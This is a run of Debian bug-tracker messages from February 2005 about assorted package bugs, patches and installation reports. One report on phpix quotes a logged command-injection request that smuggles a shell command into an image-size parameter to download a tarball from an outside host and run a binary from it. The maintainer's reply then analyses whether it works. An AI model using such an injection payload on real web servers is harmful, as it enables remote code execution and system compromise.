In the scripts /usr/sbin/{newnfserver,newvserver,stripserver}, there is
the line

VREBOOT_LOCATION="/usr/lib/vserver/vreboot"

which was the old locateion of the vreboot utility.

The package util-vserver now stores vreboot in
/usr/lib/util-vserver/vreboot, thus the vreboot utility is never copied
into a freshly-made vserver.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing'), (133, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.27prolibre
Locale: LANG=C, LC_CTYPE=fr_CH (charmap=ISO-8859-1)

Versions of packages vserver-debiantools depends on:
ii  binutils  2.15-5 The GNU assembler, linker and bina
ii  debootstrap   0.2.45 Bootstrap a basic Debian system
ii  rsync 2.6.3-2fast remote file copy program (lik
ii  util-vserver  0.30-14tools for Virtual private servers 

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293436: fnord: If-Modified-Since request parsed as localtime, not UTC

2005-02-03 Thread Joachim Berdal Haga
Package: fnord
Version: 1.8-5
Severity: normal
Tags: patch


If-Modified-Since headers are not parsed correctly. They are always
specified as GMT, but fnord parses them as if they were in the local
timezone.

The result is that "304 no change" may be sent for changed content
(if you're east of Greenwich) or content may be retransmitted
needlessly (if you're west of Greenwich).

The patch below fixes it for me. The first hunk is obviously correct
since mktime is, by spec, localtime. The second hunk doesn't belong
here but fixes the infinite loop mentioned in other bug ;) The third
hunk sets timezone explicitly, because it isn't set by dietlibc --
but maybe it should be?

--- fnord-1.9/httpd.c   2005-01-31 17:10:39.0 +0100
+++ fnord-1.9-new/httpd.c   2005-02-03 12:54:33.0 +0100
@@ -812,7 +812,7 @@
   if (parsetime(c,&x)) return (time_t)-1;
 done:
   x.tm_wday=x.tm_yday=x.tm_isdst=0;
-  return mktime(&x);
+  return mktime(&x)-timezone;
 }
 
 static struct stat st;
@@ -1196,7 +1196,7 @@
   off_t l=rangeend-rangestart;
   do {
off_t c;
-   c=(l>(1<<31))?1<<31:l;
+   c=(l>(1UL<<31))?1UL<<31:l;
if (sendfile(1,fd,&offset,c)==-1) break;
l-=c;
   } while (l);
@@ -1229,6 +1229,10 @@
   int len;
   int in;
 
+  struct timezone tz;
+  gettimeofday(0, &tz);
+  timezone=tz.tz_minuteswest*60L;
+
   if (argc>1) chdir(argv[1]);
 
 #ifdef CHROOT


-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.9-ac5
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293438: zope-coreblog: CoreBlog 1.1 Available Upstream

2005-02-03 Thread Federico Sevilla III
Package: zope-coreblog
Version: 1.0-3
Severity: wishlist

CoreBlog 1.1 is available upstream. It was released on 31 January 2005.
I hope you can find time to package it for Debian. Thank you very much
for making CoreBlog a breeze to install on Debian systems.

 --> Jijo

-- System Information:
Debian Release: testing/unstable
Architecture: i386
Kernel: Linux gusi 2.4.27 #1 Wed Aug 18 23:09:13 PHT 2004 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages zope-coreblog depends on:
ii  debconf [debconf-2.0] 1.4.30 Debian configuration management sy
ii  zope  2.6.4-1.1  Open Source Web Application Server

-- debconf information excluded



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293437: rhythmbox: RB should cache files so they play continually

2005-02-03 Thread Adolfo Gonzalez Blazquez
Package: rhythmbox
Version: 0.8.8-4
Severity: minor

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi!

I realized Rhythmbox adds a little delay between songs, which makes
listening to some albums very annoying, 'cause they're supossed to play
every song without gap between songs.

Maybe rb should cache files (256k in advance or something like that), so
when a song ends, the next one is in memory. This will make songs playing 
constanly.
This behaviour is found, for example, on XMMS.

Thanks for attention and sorry for crappy english!

- -- Adolfo

- -- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.10-ck5-soho
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=UTF-8)

Versions of packages rhythmbox depends on:
ii  gconf2   2.8.1-4 GNOME configuration database syste
ii  gstreamer0.8-alsa [gstre 0.8.7-3 ALSA plugin for GStreamer
ii  gstreamer0.8-artsd [gstr 0.8.7-3 aRtsd plugin for GStreamer
ii  gstreamer0.8-esd [gstrea 0.8.7-3 Enlightened Sound Daemon plugin fo
ii  gstreamer0.8-flac0.8.7-3 FLAC plugin for GStreamer
ii  gstreamer0.8-gnomevfs0.8.7-3 Gnome VFS plugin for GStreamer
ii  gstreamer0.8-jack [gstre 0.8.7-3 JACK plugin for GStreamer
ii  gstreamer0.8-mad 0.8.7-3 MAD MPEG audio decoder plugin for 
ii  gstreamer0.8-misc0.8.7-3 Collection of various GStreamer pl
ii  gstreamer0.8-oss [gstrea 0.8.7-3 OSS plugin for GStreamer
ii  gstreamer0.8-vorbis  0.8.7-3 Vorbis plugin for GStreamer
ii  libart-2.0-2 2.3.17-1Library of functions for 2D graphi
ii  libatk1.0-0  1.8.0-4 The ATK accessibility toolkit
ii  libaudiofile00.2.6-5 Open-source version of SGI's audio
ii  libbonobo2-0 2.8.0-4 Bonobo CORBA interfaces library
ii  libbonoboui2-0   2.8.0-2 The Bonobo UI library
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libesd-alsa0 [libesd0]   0.2.35-2Enlightened Sound Daemon (ALSA) - 
ii  libgconf2-4  2.8.1-4 GNOME configuration database syste
ii  libgcrypt11  1.2.0-11LGPL Crypto library - runtime libr
ii  libglade2-0  1:2.4.1-2   library to load .glade files at ru
ii  libglib2.0-0 2.6.1-3 The GLib library of C routines
ii  libgnome-keyring00.4.1-1 GNOME keyring services library
ii  libgnome2-0  2.8.0-6 The GNOME 2 library - runtime file
ii  libgnomecanvas2-02.8.0-1 A powerful object-oriented display
ii  libgnomeui-0 2.8.0-3 The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0   2.8.3-11The GNOME virtual file-system libr
ii  libgnutls11  1.0.16-13   GNU TLS library - runtime library
ii  libgpg-error01.0-1   library for common error values an
ii  libgstreamer-gconf0.8-0  0.8.7-3 GConf support for GStreamer
ii  libgstreamer0.8-00.8.8-1 Core GStreamer libraries, plugins,
ii  libgtk2.0-0  2.6.1-2 The GTK+ graphical user interface 
ii  libhowl0 0.9.8-2 Library for Zeroconf service disco
ii  libice6  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  libjpeg626b-9The Independent JPEG Group's JPEG 
ii  liborbit21:2.10.2-1.1libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-01.8.0-3 Layout and rendering of internatio
ii  libpopt0 1.7-5   lib for parsing cmdline parameters
ii  libsm6   4.3.0.dfsg.1-10 X Window System Session Management
ii  libtasn1-2   0.2.10-4Manage ASN.1 structures (runtime)
ii  libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxml2  2.6.11-5GNOME XML library
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-4   compression library - runtime

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFCAhjdHrfW3ZGQFGoRAmm5AJ0SKMjZREXHsE9ZAMzpIT6q8BATjACeKZO9
Yu6r77nFmsvmFlBnvyqSogw=
=BSfb
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#292180: imgseek

2005-02-03 Thread Ricardo Javier Cardenes Medina
On Thu, Feb 03, 2005 at 11:02:08AM +0100, Bartosz Fenski aka fEnIo wrote:
> 
> > i tried to compile your package, but it fails in the same way as on the
> > buildd. i modified the except on line 36 in setup.py so that it prints
> > the actual exception instead of just complaining, and it goes:
> > 
> >   /usr/lib/python2.3/site-packages/qt.so: undefined symbol:
> >   _ZN16QAssistantClient9qt_invokeEiP8QUObject
> > 
> > don't really know what to make of it, but perhaps it's a bug in
> > python2.3-qt3 and not in your package...
> 
> Thanks a lot for your explanation. I'm CCing to python2.3-qt maintainer,
> and to my previous bugreport.
> I'll also ask upstream for modifications about these exceptions, cause 
> without them debugging is quite hard.

Urm... It probably has to be with the last change I made on the package.
Building against QAssistantClient on MIPS/MIPSEL was impossible so I
dropped its support just for that arches, but it seems some symbols
still remain on the code after dropping support. I'll check it.

Thanks,
Ricardo.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293290: inkscape: Inkscape documentation should be available as standard online help (i.e. HTML)

2005-02-03 Thread Wolfram Quester
severity 293290 wishlist
forwarded 293290 
https://sourceforge.net/tracker/index.php?func=detail&aid=1115355&group_id=93438&atid=604309
thanks

Hi Andreas,

On Wed, Feb 02, 2005 at 10:02:08AM +0100, Andreas Neudecker wrote:
> G'day.
> 
> 
> It has been annoying me for some time now. The 'tutorial-advanced.svg', for
> example, is one endless page. This is fine with a browser page. But in 
> inkscape it is not. (By the way: How am I supposed to print this 
> out?)
> 
> Also, since Inkscape aims at following the GNOME HIG closely, shouldn't 
> the help be available in the standardised GNOME Help HTML format?
> 
> This doesn't mean the current versions should go away. I understand that
> the SVG tutorials are meant to show off features and they do it nicely.
> I am just asking to proovide online documentation in the standard format 
> by default.

Thanks for your report. I forwarded it upstream as an RFE. I think one
main purpose of the tutorials is also to provide a "learning by doing"
documentation for inkscape. This would never be achieveable with this
perfection using html-docs, I think. So what you request is essentially
additional documentation if I get it correctly.

With best regards,

Wolfi
> 
> Kind regards
> 
> 
> Andreas
> 


signature.asc
Description: Digital signature


Bug#293216: hylafax-server: problem is change from MIMENCODE=base64-encode to MIMENCODE=mimencode

2005-02-03 Thread Bodo Meissner
Package: hylafax-server
Version: 1:4.2.1-1
Followup-For: Bug #293216

Hello Guiseppe,

I think I found the problem.

In version 4.2.0 the file faxrcvd had a line
MIMENCODE=base64-encode
In 4.2.1 it has
MIMENCODE=mimencode

Package mime-codesc does have a base-64-encode but not a mimencode.

Calling faxsetup helps because it inserts 
MIMENCODE='/usr/bin/base64-encode'
into setup.cache which overwrites the assignment in faxrcvd and other 
script.

It's very likely that every user who did not call faxsetup again after 
upgrading might get this problem.

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (900, 'testing'), (300, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.27-2-686-smp
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages hylafax-server depends on:
ii  debconf  1.4.30.11   Debian configuration management sy
ii  gs-afpl [gs-alad 8.14-3  The AFPL Ghostscript PostScript in
ii  gs-esp [gs]  7.07.1-9The Ghostscript PostScript interpr
ii  hylafax-client   1:4.2.1-1   Flexible client/server fax softwar
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libgcc1  1:3.4.3-6   GCC support library
ii  libpam0g 0.76-22 Pluggable Authentication Modules l
ii  libstdc++5   1:3.3.5-5   The GNU Standard C++ Library v3
ii  libtiff-tools3.7.1-2 TIFF manipulation and conversion t
ii  libtiff4 3.7.1-2 Tag Image File Format (TIFF) libra
ii  mailx1:8.1.2-0.20040524cvs-4 A simple mail user agent
ii  mime-codecs  7.19-2  Fast Quoted-Printable and BASE64 M
ii  psmisc   21.5-1  Utilities that use the proc filesy
ii  sed  4.1.2-8 The GNU sed stream editor
ii  zlib1g   1:1.2.2-3   compression library - runtime

-- debconf information excluded


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293440: Debian Sarge RC2 Installation report

2005-02-03 Thread Albertalli Luca
Package: installation-reports
Debian-installer-version: Debian Sarge RC2
uname -a: 
Date: 03 February 2005 13:20
Method: Install From the Official "netinst CD image" of Debian Sarge RC2

Machine: Santech A1760CR (Compal CL56)
Processor: Intel Pentium Mobile 755 (2.0 GHz)
Memory: 2x512 MByte Kingstone DDR2700
Root Device: IDE - IBM/Hitachi Travelstar E7K60 - 60 GByte
Graphic Device: Ati Mobile Radeon 9700 - 128 Mb Ram
Root Size/partition table: None
Output of lspci and lspci -n: None
Base System Installation Checklist:
[O] = OK, [E] = Error (please elaborate below), [ ] = didn't try it
Initial boot worked:[E]
Configure network HW:   [ ]
Config network: [ ]
Detect CD:  [ ]
Load installer modules: [ ]
Detect hard drives: [ ]
Partition hard drives:  [ ]
Create file systems:[ ]
Mount partitions:   [ ]
Install base system:[ ]
Install boot loader:[ ]
Reboot: [ ]
Comments/Problems:
After Booting from the Cd appear the BootPrompt. The Debian Logo is deformed but still 
possible to procede. After booting the Kernel (also using the linux26 flavour) appear 
a black screen and nothing more. There's no Cd or HDD work. Nothing.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Bug#293439: mantis.postinst failed

2005-02-03 Thread Miroslav Maiksnar
Package: mantis
Version: 0.19.2-1
Severity: grave
Justification: renders package unusable



-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.9-alfons32-2
Locale: LANG=cs_CZ.UTF-8, LC_CTYPE=cs_CZ.UTF-8 (charmap=UTF-8)

Versions of packages mantis depends on:
ii  apache [httpd]   1.3.33-3versatile, high-performance HTTP s
ii  apache2-mpm-prefork [httpd]  2.0.52-3Traditional model for Apache2
ii  debconf  1.4.30.11   Debian configuration management sy
ii  grep 2.5.1.ds1-4 GNU grep, egrep and fgrep
ii  libapache2-mod-php4  4:4.3.10-2  server-side, HTML-embedded scripti
ii  libphp-adodb 4.52-1  The 'adodb' database abstraction l
ii  makepasswd   1.10-2  Generate and encrypt passwords
ii  mysql-client 4.0.23-3mysql database client binaries
ii  php4-cgi 4:4.3.10-2  server-side, HTML-embedded scripti
ii  php4-cli 4:4.3.10-2  command-line interpreter for the p
ii  php4-mysql   4:4.3.10-2  MySQL module for php4
ii  wwwconfig-common 0.0.42  Debian web auto configuration

-- debconf information:
  mantis/title: Mantis
* mantis/url: http://localhost/mantis/
  mantis/bounce: [EMAIL PROTECTED]
* mantis/db_autoupdate: true
* mantis/ldap: false
  mantis/ldap_server: localhost
  mantis/version:
  mantis/from: [EMAIL PROTECTED]
  mantis/show_version: true
  mantis/root_mysql: root
  mantis/signup: true
  mantis/admin: [EMAIL PROTECTED]
  mantis/ldap_info:
* mantis/username: mantis
  mantis/webmaster: [EMAIL PROTECTED]
* mantis/purge_db: true
  mantis/dn: dn=
  mantis/mysql_port: 3306
* mantis/webserver: apache, apache-ssl
* mantis/app_configure: true
  mantis/language: english
* mantis/mysql_server: localhost
* mantis/database: bugtracker
  mantis/organisation:


-- apt output:
Setting up mantis (0.19.2-1) ...
I: Using password from existing config file.
I: Creating database user 'mantis'
I: User created.
I: Adding database 'bugtracker'
I: No need to create database.
Rotated `/etc/mantis/config.php' at Thu Feb  3 13:22:54 CET 2005.
I: creating /etc/mantis/config.php
/var/lib/dpkg/info/mantis.postinst: line 32: [: /etc/apache: binary
operator expected
/var/lib/dpkg/info/mantis.postinst: line 24: [: /etc/apache: binary
operator expected
/var/lib/dpkg/info/mantis.postinst: line 23: [: /etc/apache: binary
operator expected
/var/lib/dpkg/info/mantis.postinst: line 35: /etc/apache
apache-ssl/httpd.conf: No such file or directory
dpkg: error processing mantis (--configure):
 subprocess post-installation script returned error exit status 1
 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293441: phppgadmin: PHP dependencies mixed up

2005-02-03 Thread Peter Eisentraut
Package: phppgadmin
Version: 3.5.1-1
Severity: normal

The PHP dependency should either be php4 | php4-cgi or
libapache-mod-php4 | libapache2-mod-php4 | php4-cgi (ignoring the order
for now).  php4 is a metapackage that depends on either of the apache
modules, so listing both the metapackage and the module is redundant.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#277085: status of this ITP?

2005-02-03 Thread pabs
Hey,

just wondering what the status of these ITPs are, as I've packaged
gnochm/pychm without seeing the ITPs, oops. Packages here:
http://bonedaddy.net/pabs3/debian/

-- 
bye,
pabs


signature.asc
Description: This is a digitally signed message part


Bug#293104: djvulibre-plugin: `open in new tab' doesn't work in galeon

2005-02-03 Thread Barak Pearlmutter
This seems to not be a problem with mozilla, which is really the
plugin target.  I think it would make sense to transfer this issue to
galeon, and if they find that there is a fault in the djvu plugin
then it can be reassigned back and forwarded upstream.  But given that
other browsers do not exhibit this problem, I suspect the fault is
with galeon...

--Barak.
--
Barak A. Pearlmutter
 Hamilton Institute & Dept Comp Sci, NUI Maynooth, Co. Kildare, Ireland
 http://www-bcl.cs.nuim.ie/~barak/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#266566: Status of gnokii-licence-violation problem

2005-02-03 Thread Holger Levsen
Hi,

I just subscribed to this list, read the archives from last summer, esp. 
http://albatross.madduck.net/pipermail/gammu-legal/2004-October/000112.html 
and would like to hear your comments regarding the solution of 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=266566.

If I understood the patches from October correctly, the bug fix is there and 
"only" has to be applied to the debian packages ? 

My main motivation is http://bjorn.haxx.se/debian/testing.pl?package=kdepim


Hach, is life easy if you only have to quote three URLs to convey your 
message :-)

regards,
 Holger


pgppXa4wNM27d.pgp
Description: PGP signature


Bug#293442: tetex-base: broken symlink /usr/share/texmf/dvips/base/psfonts.map

2005-02-03 Thread Julian Gilbey
Package: tetex-base
Version: 2.0.2c-3

The symlink /usr/share/texmf/dvips/base/psfonts.map ->
../config/psfonts.map is broken: it should point to
/etc/texmf/dvips/base/psfonts.map or
/etc/texmf/dvips/config/psfonts.map.

   Julian


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293440: Debian Sarge RC2 Installation report

2005-02-03 Thread Frans Pop
On Thursday 03 February 2005 13:43, Albertalli Luca wrote:
> After Booting from the Cd appear the BootPrompt. The Debian Logo is
> deformed but still possible to procede. After booting the Kernel (also
> using the linux26 flavour) appear a black screen and nothing more.
> There's no Cd or HDD work. Nothing.

Try booting the installer with extra parameter 
'debian-installer/framebuffer=false' or 'video=vga16:off'.
See the Fxx help screens and the installation manual [1] for more things 
you could try.

[1] http://d-i.alioth.debian.org/manual/

Cheers,
FJP


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293444: gosa: same uids in selectbox when creating new user

2005-02-03 Thread NoÃl KÃthe
Package: gosa
Version: 2.2-1
Severity: minor

Hello,

when creating a new user like
first name  er1
last name   test

(to get the loginname "tester1")
the uid select box offers "tester" "tester1" and "tester1".

As you see the same uid is offered twice.

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.10-1-686
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)

Versions of packages gosa depends on:
pn  apache | apache-ssl | apac   Not found.
pn  fpingNot found.
ii  imagemagick6:6.0.6.2-2.1 Image manipulation programs
pn  libcrypt-smbhash-perlNot found.
pn  php4 | libapache2-mod-php4   Not found.
pn  php4-cgi | libapache2-mod-   Not found.
pn  php4-gd  Not found.
pn  php4-imapNot found.
pn  php4-ldapNot found.
pn  php4-mcrypt  Not found.
pn  php4-mhash   Not found.
pn  php4-mysql   Not found.
ii  postfix [mail-transport-ag 2.1.5-5   A high-performance mail transport 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293443: Alert on conffile outside /etc

2005-02-03 Thread Jeroen van Wolffelaar
Package: lintian
Version: 1.23.8
Severity: normal

A conffile almost always implies a configuration file. A conffile
outside /etc is therefore quite likely a mistake.

--Jeroen

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8)

Versions of packages lintian depends on:
ii  binutils   2.15-5The GNU assembler, linker and bina
ii  diffstat   1.35-1produces graph of changes introduc
ii  file   4.12-1Determines file type using "magic"
ii  gettext0.14.1-7  GNU Internationalization utilities
ii  intltool-debian0.30+20040213 Help i18n of RFC822 compliant conf
ii  man-db 2.4.2-19  The on-line manual pager
ii  perl [libdigest-md5-perl]  5.8.4-5   Larry Wall's Practical Extraction 

-- no debconf information

-- 
Jeroen van Wolffelaar
[EMAIL PROTECTED]
http://jeroen.A-Eskwadraat.nl


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#288899: Package is insecure and has been exploited. Allows remote execution with php permissions

2005-02-03 Thread Felix Berger
On Thursday 06 January 2005 08:33, Timothy wrote:
> Package: phpix
> Version: 2.0.2-6
> Severity : grave
> Allows remote execution with permissions of user running php
>
> [05/Jan/2005:09:33:32 +]
> "?mode=view&album=game&pic=2003.10.25.21.57.54.jpg&dispsize=%60cd%20/var/tm
>p;wget%20lightb.us/za.tgz;tar%20xzvf%20za.tgz;cd%20za;./zbind`&start=0"
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

I get the following results for phpix 2.0.2-6.

convert: Unable to open file (/var/tmp;wget) [No such file or directory]. 
convert: Unable to open file (lightb.us/za.tgz;tar) [No such file or 
directory]. convert: Unable to open file (xzvf) [No such file or directory]. 
convert: Unable to open file (za.tgz;cd) [No such file or directory]. 
convert: Unable to open file (za;./zbind`x0) [No such file or directory]. 
convert: Unable to open file 
(/home/bflat1/public_html/cvs/phpix/generated/us/08__scaled_`cd /var/tmp\;wget 
lightb.us/za.tgz\;tar xzvf za.tgz\;cd za\;./zbind`.jpg) [No such file or 
directory]. 
Warning: getimagesize: Unable to open 
'/home/bflat1/public_html/cvs/phpix/generated/us/08__scaled_\`cd /var/tmp\;wget 
lightb.us/za.tgz\;tar xzvf za.tgz\;cd za\;./zbind\`.jpg' for reading. 
in /home/bflat1/public_html/cvs/phpix/index.phtml on line 275

Can you make sure you used the latest version of Debian's phpix? 

What we could do is add a check if the dispsize argument is numeric and print 
a more specific warning otherwise. But this would just be cosmetics.

Unless you comment on this I'll close this bug soon.

Sincerely,
Felix Berger

-- 
Try Debian GNU/Linux!
http://www.felix.beldesign.de/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#269783: foomatic-gui: same here, adding a printer seems to work fine, but no printer is added!

2005-02-03 Thread Guaka
Package: foomatic-gui
Version: 0.6.5.1
Followup-For: Bug #269783


Adding a new printer works fine, at least, it looks good. But no
printer is actually added.


-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.9-ck3
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ANSI_X3.4-1968) (ignored: 
LC_ALL set to C)

Versions of packages foomatic-gui depends on:
ii  foomatic-db-engine3.0.2-2linuxprinting.org printer support 
ii  gksu  1.2.2-1graphical frontend to su
ii  netcat1.10-27TCP/IP swiss army knife
ii  nmap  3.75-1 The Network Mapper
ii  pconf-detect  0.5-6  Small printer auto-detect command-
ii  python2.3.4-5An interactive high-level object-o
ii  python-glade2 2.4.1-2GTK+ bindings: Glade support
ii  python-gnome2 2.6.1-1Python bindings for the GNOME desk
ii  smbclient 3.0.10-1   a LanManager-like simple client fo

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#281690: asterisk: old command in history are not usable because spaces are not preserved correctly

2005-02-03 Thread Tzafrir Cohen
On Wed, Nov 17, 2004 at 10:50:32AM +0100, root wrote:

> The command history is not well retrieved, for example if my last
> command was "restar now", when I reconnect to asterisk and press the up
> key I get "restart\040now".

Actually the command histroy is probably not well saved but is
well-retrieved.

Those '\040'-s appear in it.

In addition, the history is not saved when the user exists asterisk -r
with ctrl-C , which is why I basically dodn't notice it before.

-- 
Tzafrir Cohen   icq#16849755  +972-50-7952406
[EMAIL PROTECTED]http://xorcom.com


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#235759: Bug#228486: No mention of german quotes in release-notes yet

2005-02-03 Thread Helge Kreutzmann
Hello,
On Thu, Jan 20, 2005 at 12:38:45AM +, Martin Michlmayr wrote:
> * Helge Kreutzmann <[EMAIL PROTECTED]> [2005-01-03 12:00]:
> > > So, I object to add this uncertain issue to the release note.  Rob,
> > > I'm sorry not to reply this request quickly, but I think we should
> > > remove it from the release announcement.
> > 
> > I ask for the re-inclusion, being backed up by the german translation
> > team, including several developers.
> > 
> > I CC:ed Martin Michlmayr as he has not participated in the
> > discussion so far (hence being neutral) to ask him to help find a
> > solution about this note in the release notes.
> 
> I didn't have any plans to join this discussion and I'm not sure what
> I can add.  FWIW, I exclusively use an English locale.  Anyway, I've

maybe I have been imprecise. I did not intend you to offer an opinion
on the issue itself, but rather help the currently stuck positions get
unstuck, i.e., moderate between GOTO and this list (or maybe you know
someone who can moderate).

> read through the whole bug log now.  I personally agree that these
> quotation marks are quite ugly and I don't see why the release notes
> shouldn't mention this.  However, they should take GOTO Masanori's
> objections into account.  Why cannot the release notes say that the
> current style in non-UTF8 is ugly and that there is a discussion going
> on about how they will be presented in the future?  I think that would
> take both sides into account.

GOTO, if we add something along these lines, would this be acceptable
to you?

Greetings

 Helge
-- 
Helge Kreutzmann, Dipl.-Phys.   [EMAIL PROTECTED]
   gpg signed mail preferred 
64bit GNU powered  http://www.itp.uni-hannover.de/~kreutzm
   Help keep free software "libre": http://www.freepatents.org/


pgppnswYWw4C3.pgp
Description: PGP signature


Bug#293445: gpdf: remember position on page on page change

2005-02-03 Thread Michael Piefel
Package: gpdf
Version: 2.8.2-1.1
Severity: wishlist

When changing pages, gpdf remember the _horizontal_ position. It should
also remember the _vertical_ position. (Like xdvi 'k'.)

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7-1-686
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)

Versions of packages gpdf depends on:
ii  libart-2.0-2 2.3.16-6Library of functions for 2D graphi
ii  libatk1.0-0  1.8.0-4 The ATK accessibility toolkit
ii  libbonobo2-0 2.8.0-4 Bonobo CORBA interfaces library
ii  libbonoboui2-0   2.8.0-2 The Bonobo UI library
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libfreetype6 2.1.7-2.3   FreeType 2 font engine, shared lib
ii  libgcc1  1:3.4.3-7   GCC support library
ii  libgconf2-4  2.8.1-4 GNOME configuration database syste
ii  libglade2-0  1:2.4.1-1   Library to load .glade files at ru
ii  libglib2.0-0 2.6.1-3 The GLib library of C routines
ii  libgnome2-0  2.8.0-6 The GNOME 2 library - runtime file
ii  libgnomecanvas2-02.8.0-1 A powerful object-oriented display
ii  libgnomeprint2.2-0   2.8.2-1 The GNOME 2.2 print architecture -
ii  libgnomeprintui2.2-0 2.8.2-2 GNOME 2.2 print architecture User 
ii  libgnomeui-0 2.8.0-3 The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0   2.8.3-9 The GNOME virtual file-system libr
ii  libgtk2.0-0  2.4.14-2The GTK+ graphical user interface 
ii  libice6  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  liborbit21:2.10.2-1.1libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-01.6.0-3 Layout and rendering of internatio
ii  libpaper11.1.14-3Library for handling paper charact
ii  libpopt0 1.7-5   lib for parsing cmdline parameters
ii  libsm6   4.3.0.dfsg.1-10 X Window System Session Management
ii  libstdc++5   1:3.3.5-6   The GNU Standard C++ Library v3
ii  libxml2  2.6.11-5GNOME XML library
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-4   compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293446: ncpfs: CAN-2005-0013 and CAN-2005-0014

2005-02-03 Thread Helge Kreutzmann
Package: ncpfs
Version: N/A; reported 2005-02-03
Severity: grave
Justification: user security hole

I saw these advisories from Gentoo http://lwn.net/Alerts/121395/ and
Mandrake http://lwn.net/Alerts/121824/. According to the Gentoo
advisory, Debian (both stabel and testing/unstable seem to be
vulnerable (unfortunately, the mitre-pages are still blank).

If Woody or Sarge are not vulnerable, an entry into
http://www.debian.org/security/nonvulns-woody (and -sarge) needs to be
made.



-- System Information
Debian Release: 3.0
Architecture: i386
